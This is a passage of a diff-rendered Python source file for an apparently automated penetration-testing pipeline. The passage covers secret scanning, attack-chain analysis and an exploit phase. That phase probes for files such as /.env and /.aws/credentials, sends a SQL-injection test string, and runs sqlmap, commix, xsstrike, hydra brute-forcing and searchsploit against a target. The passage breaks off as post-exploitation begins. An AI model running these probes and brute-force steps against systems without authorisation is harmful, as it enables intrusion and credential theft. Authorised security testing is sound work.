|
+
severity="high" if "api" in secret.get("RuleID", "").lower() or "key" in secret.get("RuleID", "").lower() else "medium",
|
|
1109
|
+
phase="scan",
|
|
1110
|
+
tool="gitleaks",
|
|
1111
|
+
target=secret.get("File", self.target),
|
|
1112
|
+
metadata={
|
|
1113
|
+
"rule": secret.get("RuleID"),
|
|
1114
|
+
"file": secret.get("File"),
|
|
1115
|
+
"line": secret.get("StartLine"),
|
|
1116
|
+
"match": secret.get("Match", "")[:50] + "..." if len(secret.get("Match", "")) > 50 else secret.get("Match", "")
|
|
1117
|
+
}
|
|
1118
|
+
))
|
|
1119
|
+
except (json.JSONDecodeError, FileNotFoundError):
|
|
1120
|
+
pass
|
|
1121
|
+
gitleaks_count = len([f for f in findings if f.tool == "gitleaks"])
|
|
1122
|
+
self._log_tool(f"gitleaks - {gitleaks_count} secrets found", "done")
|
|
1123
|
+
else:
|
|
1124
|
+
self._log_tool("gitleaks - not installed", "skip")
|
|
1125
|
+
except Exception as e:
|
|
1126
|
+
errors.append(f"Gitleaks error: {str(e)}")
|
|
1127
|
+
self._log_tool(f"gitleaks - error: {str(e)}", "error")
|
|
1128
|
+
|
|
1129
|
+
# 12. TruffleHog - Deep Secret Scanning
|
|
1130
|
+
self._log_tool("trufflehog", "running")
|
|
1131
|
+
try:
|
|
1132
|
+
ret, trufflehog_output = await self._run_command(
|
|
1133
|
+
f"trufflehog filesystem {self.output_dir} --json --only-verified 2>/dev/null > {self.output_dir}/trufflehog_{self.domain}.json",
|
|
1134
|
+
timeout=180
|
|
1135
|
+
)
|
|
1136
|
+
if ret == 0:
|
|
1137
|
+
tools_run.append("trufflehog")
|
|
1138
|
+
trufflehog_file = self.output_dir / f"trufflehog_{self.domain}.json"
|
|
1139
|
+
if trufflehog_file.exists() and trufflehog_file.stat().st_size > 0:
|
|
1140
|
+
try:
|
|
1141
|
+
# TruffleHog outputs JSONL (one JSON per line)
|
|
1142
|
+
for line in trufflehog_file.read_text().strip().split("\n"):
|
|
1143
|
+
if line.strip():
|
|
1144
|
+
secret = json.loads(line)
|
|
1145
|
+
findings.append(Finding(
|
|
1146
|
+
type="verified_secret",
|
|
1147
|
+
value=secret.get("DetectorName", "Unknown"),
|
|
1148
|
+
description=f"Verified secret: {secret.get('DetectorName', 'Unknown')} - {secret.get('DecoderName', '')}",
|
|
1149
|
+
severity="critical", # Verified secrets are critical
|
|
1150
|
+
phase="scan",
|
|
1151
|
+
tool="trufflehog",
|
|
1152
|
+
target=secret.get("SourceMetadata", {}).get("Data", {}).get("Filesystem", {}).get("file", self.target),
|
|
1153
|
+
metadata={
|
|
1154
|
+
"detector": secret.get("DetectorName"),
|
|
1155
|
+
"verified": secret.get("Verified", False),
|
|
1156
|
+
"raw": secret.get("Raw", "")[:30] + "..." if len(secret.get("Raw", "")) > 30 else secret.get("Raw", "")
|
|
1157
|
+
}
|
|
1158
|
+
))
|
|
1159
|
+
except (json.JSONDecodeError, FileNotFoundError):
|
|
1160
|
+
pass
|
|
1161
|
+
trufflehog_count = len([f for f in findings if f.tool == "trufflehog"])
|
|
1162
|
+
self._log_tool(f"trufflehog - {trufflehog_count} verified secrets", "done")
|
|
1163
|
+
else:
|
|
1164
|
+
self._log_tool("trufflehog - not installed", "skip")
|
|
1165
|
+
except Exception as e:
|
|
1166
|
+
errors.append(f"TruffleHog error: {str(e)}")
|
|
1167
|
+
self._log_tool(f"trufflehog - error: {str(e)}", "error")
|
|
1168
|
+
|
|
1169
|
+
# Add findings to global list
|
|
1170
|
+
for f in findings:
|
|
1171
|
+
self._add_finding(f)
|
|
1172
|
+
|
|
1173
|
+
duration = time.time() - start_time
|
|
1174
|
+
result = PhaseResult(
|
|
1175
|
+
phase=phase,
|
|
1176
|
+
status="completed",
|
|
1177
|
+
started_at=started_at,
|
|
1178
|
+
finished_at=datetime.now(timezone.utc).isoformat(),
|
|
1179
|
+
duration=duration,
|
|
1180
|
+
findings=findings,
|
|
1181
|
+
tools_run=tools_run,
|
|
1182
|
+
errors=errors,
|
|
1183
|
+
metadata={
|
|
1184
|
+
"scan_ids": self.scan_ids
|
|
1185
|
+
}
|
|
1186
|
+
)
|
|
1187
|
+
|
|
1188
|
+
self.phase_results[phase] = result
|
|
1189
|
+
if self.on_phase_complete:
|
|
1190
|
+
self.on_phase_complete(result)
|
|
1191
|
+
|
|
1192
|
+
return result
|
|
1193
|
+
|
|
1194
|
+
def _parse_nuclei_severity(self, line: str) -> str:
|
|
1195
|
+
"""Parse severity from nuclei output line."""
|
|
1196
|
+
line_lower = line.lower()
|
|
1197
|
+
if "critical" in line_lower:
|
|
1198
|
+
return "critical"
|
|
1199
|
+
elif "high" in line_lower:
|
|
1200
|
+
return "high"
|
|
1201
|
+
elif "medium" in line_lower:
|
|
1202
|
+
return "medium"
|
|
1203
|
+
elif "low" in line_lower:
|
|
1204
|
+
return "low"
|
|
1205
|
+
return "info"
|
|
1206
|
+
|
|
1207
|
+
def _map_wpscan_severity(self, severity: str) -> str:
|
|
1208
|
+
"""Map WPScan severity to standard severity levels."""
|
|
1209
|
+
severity_map = {
|
|
1210
|
+
"critical": "critical",
|
|
1211
|
+
"high": "high",
|
|
1212
|
+
"medium": "medium",
|
|
1213
|
+
"low": "low",
|
|
1214
|
+
"info": "info",
|
|
1215
|
+
"informational": "info"
|
|
1216
|
+
}
|
|
1217
|
+
return severity_map.get(severity.lower(), "medium")
|
|
1218
|
+
|
|
1219
|
+
# ==================== ANALYZE PHASE (Intelligence Module) ====================
|
|
1220
|
+
|
|
1221
|
+
async def run_analyze(self) -> PhaseResult:
|
|
1222
|
+
"""
|
|
1223
|
+
Execute intelligence analysis phase.
|
|
1224
|
+
|
|
1225
|
+
This phase runs after SCAN to:
|
|
1226
|
+
1. Discover attack chains (vulnerability combinations)
|
|
1227
|
+
2. Prioritize findings by real-world exploitability
|
|
1228
|
+
3. Generate executive summary
|
|
1229
|
+
"""
|
|
1230
|
+
phase = Phase.ANALYZE
|
|
1231
|
+
started_at = datetime.now(timezone.utc).isoformat()
|
|
1232
|
+
start_time = time.time()
|
|
1233
|
+
findings = []
|
|
1234
|
+
tools_run = []
|
|
1235
|
+
errors = []
|
|
1236
|
+
|
|
1237
|
+
if self.on_phase_start:
|
|
1238
|
+
self.on_phase_start(phase)
|
|
1239
|
+
|
|
1240
|
+
self._log_phase(phase, f"Intelligence Analysis for {self.domain}")
|
|
1241
|
+
|
|
1242
|
+
if not self.config.enable_intelligence or not self._vuln_chainer:
|
|
1243
|
+
self._log_tool("Intelligence module disabled", "skip")
|
|
1244
|
+
duration = time.time() - start_time
|
|
1245
|
+
result = PhaseResult(
|
|
1246
|
+
phase=phase,
|
|
1247
|
+
status="skipped",
|
|
1248
|
+
started_at=started_at,
|
|
1249
|
+
finished_at=datetime.now(timezone.utc).isoformat(),
|
|
1250
|
+
duration=duration,
|
|
1251
|
+
findings=[],
|
|
1252
|
+
tools_run=[],
|
|
1253
|
+
errors=[],
|
|
1254
|
+
metadata={"reason": "Intelligence module disabled"}
|
|
1255
|
+
)
|
|
1256
|
+
self.phase_results[phase] = result
|
|
1257
|
+
return result
|
|
1258
|
+
|
|
1259
|
+
# =====================================================================
|
|
1260
|
+
# 1. Vulnerability Chaining - Discover attack paths
|
|
1261
|
+
# =====================================================================
|
|
1262
|
+
self._log_tool("Vulnerability Chaining", "running")
|
|
1263
|
+
try:
|
|
1264
|
+
# Convert findings to format expected by chainer
|
|
1265
|
+
finding_dicts = []
|
|
1266
|
+
for f in self.findings:
|
|
1267
|
+
finding_dicts.append({
|
|
1268
|
+
"title": f.value,
|
|
1269
|
+
"type": f.type,
|
|
1270
|
+
"severity": f.severity,
|
|
1271
|
+
"url": f.target or self.target,
|
|
1272
|
+
"description": f.description,
|
|
1273
|
+
"tool": f.tool,
|
|
1274
|
+
})
|
|
1275
|
+
|
|
1276
|
+
chains = self._vuln_chainer.find_chains(finding_dicts)
|
|
1277
|
+
self.attack_chains = chains
|
|
1278
|
+
|
|
1279
|
+
if chains:
|
|
1280
|
+
tools_run.append("vulnerability_chainer")
|
|
1281
|
+
self._log_tool(f"Vulnerability Chaining - {len(chains)} attack chains discovered", "done")
|
|
1282
|
+
|
|
1283
|
+
# Log critical chains
|
|
1284
|
+
for chain in chains:
|
|
1285
|
+
if chain.max_impact == "Critical":
|
|
1286
|
+
logger.warning(f"CRITICAL CHAIN: {chain.title} - {chain.impact_description}")
|
|
1287
|
+
|
|
1288
|
+
# Add as finding
|
|
1289
|
+
findings.append(Finding(
|
|
1290
|
+
type="attack_chain",
|
|
1291
|
+
value=chain.title,
|
|
1292
|
+
description=chain.impact_description,
|
|
1293
|
+
severity="critical",
|
|
1294
|
+
phase="analyze",
|
|
1295
|
+
tool="vulnerability_chainer",
|
|
1296
|
+
target=self.domain,
|
|
1297
|
+
metadata={
|
|
1298
|
+
"chain_id": chain.chain_id,
|
|
1299
|
+
"steps": len(chain.links),
|
|
1300
|
+
"vulnerabilities": [link.finding.get("title", "") for link in chain.links]
|
|
1301
|
+
}
|
|
1302
|
+
))
|
|
1303
|
+
|
|
1304
|
+
# Notify callback
|
|
1305
|
+
if self.on_chain_discovered:
|
|
1306
|
+
self.on_chain_discovered(chain)
|
|
1307
|
+
|
|
1308
|
+
# Save chains to file
|
|
1309
|
+
chains_data = [c.to_dict() for c in chains]
|
|
1310
|
+
(self.output_dir / "attack_chains.json").write_text(json.dumps(chains_data, indent=2))
|
|
1311
|
+
else:
|
|
1312
|
+
self._log_tool("Vulnerability Chaining - No chains found", "done")
|
|
1313
|
+
|
|
1314
|
+
except Exception as e:
|
|
1315
|
+
errors.append(f"Chaining error: {str(e)}")
|
|
1316
|
+
self._log_tool(f"Vulnerability Chaining - Error: {e}", "error")
|
|
1317
|
+
|
|
1318
|
+
# =====================================================================
|
|
1319
|
+
# 2. AI-Powered Triage - Prioritize by exploitability
|
|
1320
|
+
# =====================================================================
|
|
1321
|
+
self._log_tool("AI Triage", "running")
|
|
1322
|
+
try:
|
|
1323
|
+
finding_dicts = []
|
|
1324
|
+
for f in self.findings:
|
|
1325
|
+
finding_dicts.append({
|
|
1326
|
+
"title": f.value,
|
|
1327
|
+
"type": f.type,
|
|
1328
|
+
"severity": f.severity,
|
|
1329
|
+
"url": f.target or self.target,
|
|
1330
|
+
"description": f.description,
|
|
1331
|
+
"tool": f.tool,
|
|
1332
|
+
})
|
|
1333
|
+
|
|
1334
|
+
triage_result = self._ai_triage.triage(finding_dicts)
|
|
1335
|
+
self.triage_result = triage_result
|
|
1336
|
+
|
|
1337
|
+
tools_run.append("ai_triage")
|
|
1338
|
+
|
|
1339
|
+
# Save triage results
|
|
1340
|
+
(self.output_dir / "triage_result.json").write_text(
|
|
1341
|
+
json.dumps(triage_result.to_dict(), indent=2)
|
|
1342
|
+
)
|
|
1343
|
+
|
|
1344
|
+
# Save executive summary
|
|
1345
|
+
(self.output_dir / "EXECUTIVE_SUMMARY.md").write_text(triage_result.executive_summary)
|
|
1346
|
+
|
|
1347
|
+
# Log top priorities
|
|
1348
|
+
if triage_result.top_priorities:
|
|
1349
|
+
top_titles = [f["title"] for f in triage_result.top_priorities[:3]]
|
|
1350
|
+
self._log_tool(f"AI Triage - Top priorities: {', '.join(top_titles)}", "done")
|
|
1351
|
+
else:
|
|
1352
|
+
self._log_tool("AI Triage - No high-priority findings", "done")
|
|
1353
|
+
|
|
1354
|
+
except Exception as e:
|
|
1355
|
+
errors.append(f"Triage error: {str(e)}")
|
|
1356
|
+
self._log_tool(f"AI Triage - Error: {e}", "error")
|
|
1357
|
+
|
|
1358
|
+
# =====================================================================
|
|
1359
|
+
# 3. Scope Audit - Check for violations
|
|
1360
|
+
# =====================================================================
|
|
1361
|
+
if self._scope_enforcer:
|
|
1362
|
+
self._log_tool("Scope Audit", "running")
|
|
1363
|
+
violations = self._scope_enforcer.get_violations()
|
|
1364
|
+
if violations:
|
|
1365
|
+
self._log_tool(f"Scope Audit - {len(violations)} violations detected!", "done")
|
|
1366
|
+
# Save audit log
|
|
1367
|
+
audit_log = self._scope_enforcer.get_audit_log()
|
|
1368
|
+
(self.output_dir / "scope_audit.json").write_text(json.dumps(audit_log, indent=2))
|
|
1369
|
+
else:
|
|
1370
|
+
self._log_tool("Scope Audit - All requests within scope", "done")
|
|
1371
|
+
tools_run.append("scope_audit")
|
|
1372
|
+
|
|
1373
|
+
# Add findings to global list
|
|
1374
|
+
for f in findings:
|
|
1375
|
+
self._add_finding(f)
|
|
1376
|
+
|
|
1377
|
+
duration = time.time() - start_time
|
|
1378
|
+
result = PhaseResult(
|
|
1379
|
+
phase=phase,
|
|
1380
|
+
status="completed",
|
|
1381
|
+
started_at=started_at,
|
|
1382
|
+
finished_at=datetime.now(timezone.utc).isoformat(),
|
|
1383
|
+
duration=duration,
|
|
1384
|
+
findings=findings,
|
|
1385
|
+
tools_run=tools_run,
|
|
1386
|
+
errors=errors,
|
|
1387
|
+
metadata={
|
|
1388
|
+
"attack_chains_count": len(self.attack_chains),
|
|
1389
|
+
"top_priorities_count": len(self.triage_result.top_priorities) if self.triage_result else 0,
|
|
1390
|
+
"scope_violations": len(self._scope_enforcer.get_violations()) if self._scope_enforcer else 0
|
|
1391
|
+
}
|
|
1392
|
+
)
|
|
1393
|
+
|
|
1394
|
+
self.phase_results[phase] = result
|
|
1395
|
+
if self.on_phase_complete:
|
|
1396
|
+
self.on_phase_complete(result)
|
|
1397
|
+
|
|
1398
|
+
return result
|
|
1399
|
+
|
|
1400
|
+
# ==================== EXPLOIT PHASE ====================
|
|
1401
|
+
|
|
1402
|
+
async def run_exploit(self) -> PhaseResult:
|
|
1403
|
+
"""Execute exploitation/validation phase."""
|
|
1404
|
+
phase = Phase.EXPLOIT
|
|
1405
|
+
started_at = datetime.now(timezone.utc).isoformat()
|
|
1406
|
+
start_time = time.time()
|
|
1407
|
+
findings = []
|
|
1408
|
+
tools_run = []
|
|
1409
|
+
errors = []
|
|
1410
|
+
|
|
1411
|
+
if self.on_phase_start:
|
|
1412
|
+
self.on_phase_start(phase)
|
|
1413
|
+
|
|
1414
|
+
self._log_phase(phase, f"Vulnerability Validation on {self.domain}")
|
|
1415
|
+
|
|
1416
|
+
# 1. Check Sensitive Endpoints
|
|
1417
|
+
if self.config.check_sensitive_paths:
|
|
1418
|
+
self._log_tool("Sensitive Path Check", "running")
|
|
1419
|
+
|
|
1420
|
+
sensitive_paths = [
|
|
1421
|
+
"/metrics", "/actuator", "/actuator/health", "/actuator/env",
|
|
1422
|
+
"/.env", "/.git/config", "/swagger-ui.html", "/api/swagger",
|
|
1423
|
+
"/graphql", "/debug", "/admin", "/phpinfo.php",
|
|
1424
|
+
"/server-status", "/.aws/credentials", "/backup"
|
|
1425
|
+
]
|
|
1426
|
+
|
|
1427
|
+
for path in sensitive_paths:
|
|
1428
|
+
try:
|
|
1429
|
+
ret, output = await self._run_command(
|
|
1430
|
+
f"curl -s -o /dev/null -w '%{{http_code}}' '{self.target}{path}' --connect-timeout 5",
|
|
1431
|
+
timeout=10
|
|
1432
|
+
)
|
|
1433
|
+
if ret == 0 and output.strip() in ["200", "301", "302"]:
|
|
1434
|
+
severity = "high" if path in ["/.env", "/.git/config", "/.aws/credentials"] else "medium"
|
|
1435
|
+
findings.append(Finding(
|
|
1436
|
+
type="exposed_endpoint",
|
|
1437
|
+
value=f"{self.target}{path}",
|
|
1438
|
+
description=f"Sensitive endpoint accessible: {path} (HTTP {output.strip()})",
|
|
1439
|
+
severity=severity,
|
|
1440
|
+
phase="exploit",
|
|
1441
|
+
tool="path_check",
|
|
1442
|
+
target=self.target
|
|
1443
|
+
))
|
|
1444
|
+
except Exception:
|
|
1445
|
+
continue
|
|
1446
|
+
|
|
1447
|
+
exposed_count = len([f for f in findings if f.type == "exposed_endpoint"])
|
|
1448
|
+
tools_run.append("sensitive_path_check")
|
|
1449
|
+
self._log_tool(f"Sensitive Path Check - {exposed_count} exposed", "done")
|
|
1450
|
+
|
|
1451
|
+
# 2. WAF Detection
|
|
1452
|
+
self._log_tool("WAF Detection", "running")
|
|
1453
|
+
ret, output = await self._run_command(
|
|
1454
|
+
f"curl -sI \"{self.target}/?id=1'%20OR%20'1'='1\" --connect-timeout 5 | head -1",
|
|
1455
|
+
timeout=10
|
|
1456
|
+
)
|
|
1457
|
+
waf_detected = "403" in output or "406" in output or "429" in output
|
|
1458
|
+
(self.output_dir / "waf_test.txt").write_text(f"WAF Test Response: {output}\nWAF Detected: {waf_detected}")
|
|
1459
|
+
tools_run.append("waf_detection")
|
|
1460
|
+
|
|
1461
|
+
if not waf_detected:
|
|
1462
|
+
findings.append(Finding(
|
|
1463
|
+
type="waf_bypass",
|
|
1464
|
+
value="No WAF detected",
|
|
1465
|
+
description="Target does not appear to have a WAF or WAF is not blocking",
|
|
1466
|
+
severity="low",
|
|
1467
|
+
phase="exploit",
|
|
1468
|
+
tool="waf_detection",
|
|
1469
|
+
target=self.target
|
|
1470
|
+
))
|
|
1471
|
+
self._log_tool(f"WAF Detection - {'Detected' if waf_detected else 'Not detected'}", "done")
|
|
1472
|
+
|
|
1473
|
+
# ==================== EXPLOITATION TOOLS (Enabled in full_mode) ====================
|
|
1474
|
+
if self.config.full_mode or self.config.enable_exploitation:
|
|
1475
|
+
|
|
1476
|
+
# 3. SQLMap - SQL Injection Testing (NEW)
|
|
1477
|
+
if "sqlmap" in self.config.exploit_tools:
|
|
1478
|
+
self._log_tool("sqlmap", "running")
|
|
1479
|
+
sqlmap_output_dir = self.output_dir / "sqlmap"
|
|
1480
|
+
sqlmap_output_dir.mkdir(exist_ok=True)
|
|
1481
|
+
|
|
1482
|
+
# Run SQLMap in batch mode with safe settings
|
|
1483
|
+
ret, output = await self._run_command(
|
|
1484
|
+
f"sqlmap -u {shlex.quote(self.target)} --batch --forms --crawl=2 "
|
|
1485
|
+
f"--level={self.config.sqlmap_level} --risk={self.config.sqlmap_risk} "
|
|
1486
|
+
f"--output-dir={sqlmap_output_dir} --random-agent 2>/dev/null",
|
|
1487
|
+
timeout=self.config.sqlmap_timeout
|
|
1488
|
+
)
|
|
1489
|
+
if ret == 0:
|
|
1490
|
+
(self.output_dir / f"sqlmap_{self.domain}.txt").write_text(output)
|
|
1491
|
+
tools_run.append("sqlmap")
|
|
1492
|
+
|
|
1493
|
+
# Parse SQLMap findings
|
|
1494
|
+
if "is vulnerable" in output.lower() or "injection" in output.lower():
|
|
1495
|
+
# Extract vulnerable parameters
|
|
1496
|
+
vuln_params = []
|
|
1497
|
+
for line in output.split("\n"):
|
|
1498
|
+
if "Parameter:" in line or "is vulnerable" in line:
|
|
1499
|
+
vuln_params.append(line.strip())
|
|
1500
|
+
|
|
1501
|
+
if vuln_params:
|
|
1502
|
+
findings.append(Finding(
|
|
1503
|
+
type="sql_injection",
|
|
1504
|
+
value="SQL Injection Detected",
|
|
1505
|
+
description=f"SQL injection vulnerability found. Parameters: {'; '.join(vuln_params[:5])}",
|
|
1506
|
+
severity="critical",
|
|
1507
|
+
phase="exploit",
|
|
1508
|
+
tool="sqlmap",
|
|
1509
|
+
target=self.target,
|
|
1510
|
+
metadata={"vulnerable_params": vuln_params}
|
|
1511
|
+
))
|
|
1512
|
+
# Mark shell access if OS shell was obtained
|
|
1513
|
+
if "--os-shell" in output or "os-shell" in output:
|
|
1514
|
+
self.config.shell_obtained = True
|
|
1515
|
+
self.config.target_os = "linux" if "linux" in output.lower() else "windows"
|
|
1516
|
+
|
|
1517
|
+
self._log_tool(f"sqlmap - {'Vulnerable!' if vuln_params else 'No injection found'}", "done")
|
|
1518
|
+
else:
|
|
1519
|
+
self._log_tool("sqlmap - completed", "done")
|
|
1520
|
+
|
|
1521
|
+
# 4. Commix - Command Injection Testing (NEW)
|
|
1522
|
+
if "commix" in self.config.exploit_tools:
|
|
1523
|
+
self._log_tool("commix", "running")
|
|
1524
|
+
ret, output = await self._run_command(
|
|
1525
|
+
f"commix -u {shlex.quote(self.target)} --batch --crawl=1 --level=2 2>/dev/null",
|
|
1526
|
+
timeout=300
|
|
1527
|
+
)
|
|
1528
|
+
if ret == 0:
|
|
1529
|
+
(self.output_dir / f"commix_{self.domain}.txt").write_text(output)
|
|
1530
|
+
tools_run.append("commix")
|
|
1531
|
+
|
|
1532
|
+
if "is vulnerable" in output.lower() or "command injection" in output.lower():
|
|
1533
|
+
findings.append(Finding(
|
|
1534
|
+
type="command_injection",
|
|
1535
|
+
value="Command Injection Detected",
|
|
1536
|
+
description="OS command injection vulnerability found",
|
|
1537
|
+
severity="critical",
|
|
1538
|
+
phase="exploit",
|
|
1539
|
+
tool="commix",
|
|
1540
|
+
target=self.target
|
|
1541
|
+
))
|
|
1542
|
+
self.config.shell_obtained = True
|
|
1543
|
+
|
|
1544
|
+
self._log_tool("commix - completed", "done")
|
|
1545
|
+
|
|
1546
|
+
# 5. XSStrike - XSS Detection (NEW)
|
|
1547
|
+
if "xsstrike" in self.config.exploit_tools:
|
|
1548
|
+
self._log_tool("xsstrike", "running")
|
|
1549
|
+
ret, output = await self._run_command(
|
|
1550
|
+
f"xsstrike -u {shlex.quote(self.target)} --crawl -l 2 --blind 2>/dev/null",
|
|
1551
|
+
timeout=300
|
|
1552
|
+
)
|
|
1553
|
+
if ret == 0:
|
|
1554
|
+
(self.output_dir / f"xsstrike_{self.domain}.txt").write_text(output)
|
|
1555
|
+
tools_run.append("xsstrike")
|
|
1556
|
+
|
|
1557
|
+
# Parse XSS findings
|
|
1558
|
+
xss_count = output.lower().count("xss") + output.lower().count("reflection")
|
|
1559
|
+
if xss_count > 0 or "vulnerable" in output.lower():
|
|
1560
|
+
findings.append(Finding(
|
|
1561
|
+
type="xss_vulnerability",
|
|
1562
|
+
value="XSS Vulnerability Detected",
|
|
1563
|
+
description=f"Cross-site scripting vulnerability detected",
|
|
1564
|
+
severity="high",
|
|
1565
|
+
phase="exploit",
|
|
1566
|
+
tool="xsstrike",
|
|
1567
|
+
target=self.target
|
|
1568
|
+
))
|
|
1569
|
+
|
|
1570
|
+
self._log_tool(f"xsstrike - {xss_count} potential XSS", "done")
|
|
1571
|
+
|
|
1572
|
+
# 6. Hydra - Credential Brute-forcing (NEW)
|
|
1573
|
+
if "hydra" in self.config.exploit_tools:
|
|
1574
|
+
# Only run against discovered services with auth
|
|
1575
|
+
services_to_bruteforce = []
|
|
1576
|
+
|
|
1577
|
+
# Check for SSH (port 22)
|
|
1578
|
+
if any("22/tcp" in str(f.value) for f in self.findings if f.type == "open_port"):
|
|
1579
|
+
services_to_bruteforce.append(("ssh", 22))
|
|
1580
|
+
|
|
1581
|
+
# Check for FTP (port 21)
|
|
1582
|
+
if any("21/tcp" in str(f.value) for f in self.findings if f.type == "open_port"):
|
|
1583
|
+
services_to_bruteforce.append(("ftp", 21))
|
|
1584
|
+
|
|
1585
|
+
# Check for HTTP Basic Auth
|
|
1586
|
+
if any("401" in str(f.value) for f in self.findings):
|
|
1587
|
+
services_to_bruteforce.append(("http-get", 80))
|
|
1588
|
+
|
|
1589
|
+
for service, port in services_to_bruteforce[:2]: # Limit to 2 services
|
|
1590
|
+
self._log_tool(f"hydra ({service})", "running")
|
|
1591
|
+
ret, output = await self._run_command(
|
|
1592
|
+
f"hydra -L {self.config.wordlist_users} -P {self.config.wordlist_passwords} "
|
|
1593
|
+
f"-t {self.config.hydra_threads} -f -o {self.output_dir}/hydra_{service}.txt "
|
|
1594
|
+
f"{self.safe_domain} {service} 2>/dev/null",
|
|
1595
|
+
timeout=self.config.hydra_timeout
|
|
1596
|
+
)
|
|
1597
|
+
if ret == 0:
|
|
1598
|
+
tools_run.append(f"hydra_{service}")
|
|
1599
|
+
|
|
1600
|
+
if "login:" in output.lower() or "password:" in output.lower():
|
|
1601
|
+
findings.append(Finding(
|
|
1602
|
+
type="credential_found",
|
|
1603
|
+
value=f"Weak credentials on {service}",
|
|
1604
|
+
description=f"Valid credentials found for {service} service",
|
|
1605
|
+
severity="critical",
|
|
1606
|
+
phase="exploit",
|
|
1607
|
+
tool="hydra",
|
|
1608
|
+
target=f"{self.domain}:{port}",
|
|
1609
|
+
metadata={"service": service}
|
|
1610
|
+
))
|
|
1611
|
+
self.config.shell_obtained = True
|
|
1612
|
+
|
|
1613
|
+
self._log_tool(f"hydra ({service}) - completed", "done")
|
|
1614
|
+
|
|
1615
|
+
# 7. Searchsploit - Exploit Database Search (NEW)
|
|
1616
|
+
if "searchsploit" in self.config.exploit_tools:
|
|
1617
|
+
self._log_tool("searchsploit", "running")
|
|
1618
|
+
# Search for exploits based on discovered technologies
|
|
1619
|
+
search_terms = []
|
|
1620
|
+
|
|
1621
|
+
# Get technologies from whatweb/httpx findings
|
|
1622
|
+
for f in self.findings:
|
|
1623
|
+
if f.tool in ["whatweb", "httpx", "nmap"]:
|
|
1624
|
+
# Extract potential software names
|
|
1625
|
+
if "Apache" in f.value or "apache" in f.description:
|
|
1626
|
+
search_terms.append("Apache")
|
|
1627
|
+
if "nginx" in f.value.lower() or "nginx" in f.description.lower():
|
|
1628
|
+
search_terms.append("nginx")
|
|
1629
|
+
if "WordPress" in f.value or "wordpress" in f.description.lower():
|
|
1630
|
+
search_terms.append("WordPress")
|
|
1631
|
+
|
|
1632
|
+
search_terms = list(set(search_terms))[:3] # Dedupe and limit
|
|
1633
|
+
|
|
1634
|
+
for term in search_terms:
|
|
1635
|
+
ret, output = await self._run_command(
|
|
1636
|
+
f"searchsploit {shlex.quote(term)} --json 2>/dev/null | head -50"
|
|
1637
|
+
)
|
|
1638
|
+
if ret == 0 and output.strip():
|
|
1639
|
+
try:
|
|
1640
|
+
exploits = json.loads(output)
|
|
1641
|
+
if exploits.get("RESULTS_EXPLOIT"):
|
|
1642
|
+
(self.output_dir / f"searchsploit_{term}.json").write_text(output)
|
|
1643
|
+
findings.append(Finding(
|
|
1644
|
+
type="potential_exploit",
|
|
1645
|
+
value=f"Exploits found for {term}",
|
|
1646
|
+
description=f"Found {len(exploits['RESULTS_EXPLOIT'])} potential exploits for {term}",
|
|
1647
|
+
severity="info",
|
|
1648
|
+
phase="exploit",
|
|
1649
|
+
tool="searchsploit",
|
|
1650
|
+
target=self.domain,
|
|
1651
|
+
metadata={"exploits": exploits["RESULTS_EXPLOIT"][:5]}
|
|
1652
|
+
))
|
|
1653
|
+
except json.JSONDecodeError:
|
|
1654
|
+
pass
|
|
1655
|
+
|
|
1656
|
+
tools_run.append("searchsploit")
|
|
1657
|
+
self._log_tool("searchsploit - completed", "done")
|
|
1658
|
+
|
|
1659
|
+
# 8. Fetch Acunetix Results (if scan completed)
|
|
1660
|
+
if "acunetix" in self.scan_ids and not self.config.wait_for_scanners:
|
|
1661
|
+
self._log_tool("Fetching Acunetix Results", "running")
|
|
1662
|
+
try:
|
|
1663
|
+
acunetix = get_acunetix()
|
|
1664
|
+
status = acunetix.get_scan_status(self.scan_ids["acunetix"])
|
|
1665
|
+
|
|
1666
|
+
if status.status == "completed":
|
|
1667
|
+
vulns = acunetix.get_scan_vulnerabilities(self.scan_ids["acunetix"])
|
|
1668
|
+
for vuln in vulns:
|
|
1669
|
+
findings.append(Finding(
|
|
1670
|
+
type="vulnerability",
|
|
1671
|
+
value=vuln.name,
|
|
1672
|
+
description=vuln.description or vuln.name,
|
|
1673
|
+
severity=vuln.severity,
|
|
1674
|
+
phase="exploit",
|
|
1675
|
+
tool="acunetix",
|
|
1676
|
+
target=vuln.affected_url,
|
|
1677
|
+
metadata={
|
|
1678
|
+
"vuln_id": vuln.vuln_id,
|
|
1679
|
+
"cvss": vuln.cvss_score
|
|
1680
|
+
}
|
|
1681
|
+
))
|
|
1682
|
+
self._log_tool(f"Acunetix Results - {len(vulns)} vulnerabilities", "done")
|
|
1683
|
+
else:
|
|
1684
|
+
self._log_tool(f"Acunetix - Scan still {status.status} ({status.progress}%)", "done")
|
|
1685
|
+
except Exception as e:
|
|
1686
|
+
errors.append(f"Error fetching Acunetix results: {e}")
|
|
1687
|
+
|
|
1688
|
+
# Add findings to global list
|
|
1689
|
+
for f in findings:
|
|
1690
|
+
self._add_finding(f)
|
|
1691
|
+
|
|
1692
|
+
duration = time.time() - start_time
|
|
1693
|
+
result = PhaseResult(
|
|
1694
|
+
phase=phase,
|
|
1695
|
+
status="completed",
|
|
1696
|
+
started_at=started_at,
|
|
1697
|
+
finished_at=datetime.now(timezone.utc).isoformat(),
|
|
1698
|
+
duration=duration,
|
|
1699
|
+
findings=findings,
|
|
1700
|
+
tools_run=tools_run,
|
|
1701
|
+
errors=errors
|
|
1702
|
+
)
|
|
1703
|
+
|
|
1704
|
+
self.phase_results[phase] = result
|
|
1705
|
+
if self.on_phase_complete:
|
|
1706
|
+
self.on_phase_complete(result)
|
|
1707
|
+
|
|
1708
|
+
return result
|
|
1709
|
+
|
|
1710
|
+
# ==================== POST-EXPLOITATION PHASE (NEW) ====================
|
|
1711
|
+
|
|
1712
|
+
async def run_post_exploit(self) -> PhaseResult:
|
|
1713
|
+
"""
|
|
1714
|
+
Execute post-exploitation phase.
|
|
1715
|
+
|
|
1716
|
+
This phase auto-triggers when shell access is obtained during exploitation.
|
|
1717
|
+
Runs privilege escalation tools to discover further attack paths.
|
|
1718
|
+
"""
|
|
1719
|
+
phase = Phase.POST_EXPLOIT
|
|
1720
|
+
started_at = datetime.now(timezone.utc).isoformat()
|
|
1721
|
+
start_time = time.time()
|
|
1722
|
+
findings = []
|
|
1723
|
+
tools_run = []
|
|
1724
|
+
errors = []
|
|
1725
|
+
|
|
1726
|
+
if self.on_phase_start:
|
|
1727
|
+
self.on_phase_start(phase)
|
|
1728
|
+
|
|
1729
|
+
self._log_phase(phase, f"Post-Exploitation on {self.domain}")
|
|
1730
|
+
|
|
1731
|
+
